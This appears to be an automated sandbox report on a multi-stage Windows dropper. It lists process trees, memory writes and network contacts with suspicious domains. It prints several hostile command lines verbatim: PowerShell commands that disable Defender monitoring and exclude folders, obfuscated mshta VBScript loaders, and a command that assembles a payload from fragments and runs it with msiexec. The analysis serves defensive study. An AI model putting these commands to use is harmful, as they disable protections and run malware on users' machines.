Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4844 wrote to memory of 4712 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\setup_install.exe
PID 4844 wrote to memory of 4712 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\setup_install.exe
PID 4844 wrote to memory of 4712 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\setup_install.exe
PID 4712 wrote to memory of 3368 N/A C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4712 wrote to memory of 3368 N/A C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4712 wrote to memory of 3368 N/A C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4712 wrote to memory of 764 N/A C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4712 wrote to memory of 764 N/A C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4712 wrote to memory of 764 N/A C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 764 wrote to memory of 1764 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 764 wrote to memory of 1764 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 764 wrote to memory of 1764 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3368 wrote to memory of 2452 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3368 wrote to memory of 2452 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3368 wrote to memory of 2452 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4712 wrote to memory of 4776 N/A C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4712 wrote to memory of 4776 N/A C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4712 wrote to memory of 4776 N/A C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4712 wrote to memory of 4492 N/A C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4712 wrote to memory of 4492 N/A C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4712 wrote to memory of 4492 N/A C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4712 wrote to memory of 1496 N/A C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4712 wrote to memory of 1496 N/A C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4712 wrote to memory of 1496 N/A C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4712 wrote to memory of 2324 N/A C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4712 wrote to memory of 2324 N/A C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4712 wrote to memory of 2324 N/A C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4712 wrote to memory of 4728 N/A C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4712 wrote to memory of 4728 N/A C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4712 wrote to memory of 4728 N/A C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4712 wrote to memory of 1856 N/A C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4712 wrote to memory of 1856 N/A C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4712 wrote to memory of 1856 N/A C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4712 wrote to memory of 2112 N/A C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4712 wrote to memory of 2112 N/A C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4712 wrote to memory of 2112 N/A C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4712 wrote to memory of 1532 N/A C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4712 wrote to memory of 1532 N/A C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4712 wrote to memory of 1532 N/A C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4712 wrote to memory of 3668 N/A C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4712 wrote to memory of 3668 N/A C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4712 wrote to memory of 3668 N/A C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4712 wrote to memory of 4072 N/A C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4712 wrote to memory of 4072 N/A C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4712 wrote to memory of 4072 N/A C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4712 wrote to memory of 2852 N/A C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4712 wrote to memory of 2852 N/A C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4712 wrote to memory of 2852 N/A C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4712 wrote to memory of 1056 N/A C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4712 wrote to memory of 1056 N/A C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4712 wrote to memory of 1056 N/A C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4712 wrote to memory of 4500 N/A C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4712 wrote to memory of 4500 N/A C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4712 wrote to memory of 4500 N/A C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4712 wrote to memory of 2544 N/A C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\setup_install.exe C:\Windows\System32\Conhost.exe
PID 4712 wrote to memory of 2544 N/A C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\setup_install.exe C:\Windows\System32\Conhost.exe
PID 4712 wrote to memory of 2544 N/A C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\setup_install.exe C:\Windows\System32\Conhost.exe
PID 4712 wrote to memory of 4136 N/A C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\setup_install.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4712 wrote to memory of 4136 N/A C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\setup_install.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4712 wrote to memory of 4136 N/A C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\setup_install.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4500 wrote to memory of 3792 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\Tue19cd42a7c874e44.exe
PID 4500 wrote to memory of 3792 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\Tue19cd42a7c874e44.exe
PID 2544 wrote to memory of 2600 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\Tue19b4b38a7569a9.exe
PID 2544 wrote to memory of 2600 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\Tue19b4b38a7569a9.exe

Processes

C:\Users\Admin\AppData\Local\Temp\setup_installer.exe

"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"

C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\setup_install.exe

"C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\setup_install.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Tue19ac3c92c21.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Tue19c9e031f4.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Tue1932df4dae.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Tue193e530416b51740a.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Tue19c28f648204dbd4.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Tue1968b7ee9058232e8.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Tue196397c0f84f8.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Tue192c34b1c2f5.exe /mixone

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Tue197e9ec0ff0.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Tue193129b31e741ef3.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Tue19cef5687a.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Tue19d1fc7d2654d7a.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Tue19cd42a7c874e44.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Tue19b4b38a7569a9.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Tue19f40f8518b9946.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 4712 -ip 4712

C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\Tue19cd42a7c874e44.exe

Tue19cd42a7c874e44.exe

C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\Tue19b4b38a7569a9.exe

Tue19b4b38a7569a9.exe

C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\Tue1932df4dae.exe

Tue1932df4dae.exe

C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\Tue197e9ec0ff0.exe

Tue197e9ec0ff0.exe

C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\Tue19cef5687a.exe

Tue19cef5687a.exe

C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\Tue19d1fc7d2654d7a.exe

Tue19d1fc7d2654d7a.exe

C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\Tue19c9e031f4.exe

Tue19c9e031f4.exe

C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\Tue19ac3c92c21.exe

Tue19ac3c92c21.exe

C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\Tue193e530416b51740a.exe

Tue193e530416b51740a.exe

C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\Tue1968b7ee9058232e8.exe

Tue1968b7ee9058232e8.exe

C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\Tue193129b31e741ef3.exe

Tue193129b31e741ef3.exe

C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\Tue196397c0f84f8.exe

Tue196397c0f84f8.exe

C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\Tue192c34b1c2f5.exe

Tue192c34b1c2f5.exe /mixone

C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\Tue19c28f648204dbd4.exe

Tue19c28f648204dbd4.exe

C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\Tue19f40f8518b9946.exe

Tue19f40f8518b9946.exe

C:\Users\Admin\AppData\Local\Temp\is-KQK07.tmp\Tue196397c0f84f8.tmp

"C:\Users\Admin\AppData\Local\Temp\is-KQK07.tmp\Tue196397c0f84f8.tmp" /SL5="$C0068,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\Tue196397c0f84f8.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4712 -s 620

C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\Tue19d1fc7d2654d7a.exe

C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\Tue19d1fc7d2654d7a.exe

C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\Tue193e530416b51740a.exe

C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\Tue193e530416b51740a.exe

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\System32\mshta.exe" VbscrIPt: CLOsE( crEATeObjEcT( "wsCRipt.SheLl" ). RUN ( "C:\Windows\system32\cmd.exe /q /C tYPe ""C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\Tue1932df4dae.exe"" > ~Xy1GPomKV09sC.Exe && stART ~Xy1gPomkV09sC.eXe -PyARgXd6fRp1GJRov7bdbpPssZBLJ &if """" == """" for %x In ( ""C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\Tue1932df4dae.exe"" ) do taskkill -iM ""%~nXx"" /f " , 0 , TRuE ) )

C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\Tue19f40f8518b9946.exe

C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\Tue19f40f8518b9946.exe

C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\Tue196397c0f84f8.exe

"C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\Tue196397c0f84f8.exe" /SILENT

C:\Users\Admin\AppData\Local\Temp\is-7U75N.tmp\Tue196397c0f84f8.tmp

"C:\Users\Admin\AppData\Local\Temp\is-7U75N.tmp\Tue196397c0f84f8.tmp" /SL5="$20230,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\Tue196397c0f84f8.exe" /SILENT

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /q /C tYPe "C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\Tue1932df4dae.exe" > ~Xy1GPomKV09sC.Exe && stART ~Xy1gPomkV09sC.eXe -PyARgXd6fRp1GJRov7bdbpPssZBLJ &if "" == "" for %x In ( "C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\Tue1932df4dae.exe") do taskkill -iM "%~nXx" /f

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 4088 -ip 4088

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4088 -s 360

C:\Users\Admin\AppData\Local\Temp\~Xy1GPomKV09sC.Exe

~Xy1gPomkV09sC.eXe -PyARgXd6fRp1GJRov7bdbpPssZBLJ

C:\Windows\SysWOW64\taskkill.exe

taskkill -iM "Tue1932df4dae.exe" /f

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\System32\mshta.exe" VbscrIPt: CLOsE( crEATeObjEcT( "wsCRipt.SheLl" ). RUN ( "C:\Windows\system32\cmd.exe /q /C tYPe ""C:\Users\Admin\AppData\Local\Temp\~Xy1GPomKV09sC.Exe"" > ~Xy1GPomKV09sC.Exe && stART ~Xy1gPomkV09sC.eXe -PyARgXd6fRp1GJRov7bdbpPssZBLJ &if ""-PyARgXd6fRp1GJRov7bdbpPssZBLJ "" == """" for %x In ( ""C:\Users\Admin\AppData\Local\Temp\~Xy1GPomKV09sC.Exe"" ) do taskkill -iM ""%~nXx"" /f " , 0 , TRuE ) )

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /q /C tYPe "C:\Users\Admin\AppData\Local\Temp\~Xy1GPomKV09sC.Exe" > ~Xy1GPomKV09sC.Exe && stART ~Xy1gPomkV09sC.eXe -PyARgXd6fRp1GJRov7bdbpPssZBLJ &if "-PyARgXd6fRp1GJRov7bdbpPssZBLJ " == "" for %x In ( "C:\Users\Admin\AppData\Local\Temp\~Xy1GPomKV09sC.Exe") do taskkill -iM "%~nXx" /f

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\System32\mshta.exe" vBscrIpt: cLosE ( cREatEObjEcT ( "wscript.sHeLl" ). Run ( "cMD.ExE /R ECHO | seT /P = ""MZ"" > F3U_R.J & CoPy /B /Y F3U_R.J + RqC~~.A + TfSAy.w + y5ULsw.L6+ AobbVRP.2Y + WvAi.2 BENCc.E & Start msiexec -Y .\bENCc.E " , 0 , TruE ) )

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /R ECHO | seT /P = "MZ" >F3U_R.J & CoPy /B /Y F3U_R.J + RqC~~.A + TfSAy.w + y5ULsw.L6+ AobbVRP.2Y + WvAi.2 BENCc.E & Start msiexec -Y .\bENCc.E

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" ECHO "

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" seT /P = "MZ" 1>F3U_R.J"

C:\Windows\SysWOW64\msiexec.exe

msiexec -Y .\bENCc.E

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c taskkill /f /im chrome.exe

C:\Windows\SysWOW64\taskkill.exe

taskkill /f /im chrome.exe

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x120,0x124,0x128,0xfc,0x12c,0x7fffd772cc40,0x7fffd772cc4c,0x7fffd772cc58

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1952,i,14640747440211676050,9857495874193813755,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=1948 /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2200,i,14640747440211676050,9857495874193813755,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2176 /prefetch:3

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2268,i,14640747440211676050,9857495874193813755,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2280 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3116,i,14640747440211676050,9857495874193813755,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3128 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3160,i,14640747440211676050,9857495874193813755,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3152 /prefetch:1

C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe

"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4600,i,14640747440211676050,9857495874193813755,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4544 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=3712,i,14640747440211676050,9857495874193813755,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4712 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4716,i,14640747440211676050,9857495874193813755,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4688 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4952,i,14640747440211676050,9857495874193813755,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4948 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=5028,i,14640747440211676050,9857495874193813755,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4928 /prefetch:8

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=3748,i,14640747440211676050,9857495874193813755,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2856 /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=3468,i,14640747440211676050,9857495874193813755,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3804 /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --use-gl=angle --use-angle=swiftshader-webgl --field-trial-handle=2128,i,14640747440211676050,9857495874193813755,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2108 /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --use-gl=angle --use-angle=swiftshader-webgl --field-trial-handle=3908,i,14640747440211676050,9857495874193813755,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2100 /prefetch:2

C:\Windows\system32\dwm.exe

"dwm.exe"

C:\Windows\system32\dwm.exe

"dwm.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --use-gl=angle --use-angle=swiftshader-webgl --field-trial-handle=3552,i,14640747440211676050,9857495874193813755,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3480 /prefetch:2

Network

Country Destination Domain Proto
US 8.8.8.8:53 13.86.106.20.in-addr.arpa udp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp
US 8.8.8.8:53 marianu.xyz udp
NL 45.133.1.107:80 tcp
NL 45.133.1.107:80 tcp
US 8.8.8.8:53 s.lletlee.com udp
US 8.8.8.8:53 www.listincode.com udp
US 8.8.8.8:53 0.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 cdn.discordapp.com udp
US 54.205.158.59:443 www.listincode.com tcp
US 162.159.134.233:443 cdn.discordapp.com tcp
US 8.8.8.8:53 niemannbest.me udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 all-mobile-pa1ments.com.mx udp
